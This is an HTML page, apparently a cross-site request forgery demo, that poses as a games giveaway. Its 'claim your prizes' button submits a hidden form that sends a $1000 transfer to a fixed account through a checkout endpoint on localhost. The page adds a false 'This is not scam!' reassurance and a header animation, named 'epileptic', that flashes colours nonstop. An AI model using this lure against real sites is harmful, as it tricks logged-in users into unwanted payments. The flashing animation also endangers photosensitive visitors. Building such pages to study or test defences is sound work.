<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Zip Zap Games for homies</title>
  </head>
  <body>
    <div class="header">
      <h1>Hello dear stranger!</h1>
    </div>
    <h4>Would you like to try our games for heroes?</h3>
    <h3 class="under">Let's dive into it!</h3>
    <h5>
      IMPORTANT NOTE: This is not scam! please be careful and use only original zip-zap-games on
      our platform
    </h5>
    <form action="http://localhost:3000/checkout" method="post">
      <input type="hidden" name="to_account" value="21334514643">
      <input type="hidden" name="usd_amount" value="1000">
      <button type="submit">LET'S CLAIM YOUR PRIZES!</button>
    </form>
  </body>
  <style>
    * {
      font-family: Arial, Helvetica, sans-serif;
    }
    body {
      text-align: center;
    }
    button[type=submit] {
      outline: none;
      background: #0eb863;
      color: aliceblue;
      border: none;
      border-radius: 5px;
      padding: 15px;
      font-size: 1.25rem;
    }
    .header {
      background-color: rgb(209, 84, 84);;
      animation-name: epileptic;
      animation-duration: 1s;
      animation-iteration-count: infinite;
      border-radius: 5px;
      padding: 20px;
    }
    .description {
      color: #585858;
    }
    .under {
      text-decoration: underline;
    }
    @keyframes epileptic {
      0%   {background-color: rgb(209, 84, 84);}
      25%  {background-color: rgb(233, 180, 58);}
      50%  {background-color: rgb(77, 146, 211);}
      100% {background-color: rgb(89, 194, 89);}
    }
  </style>
</html>
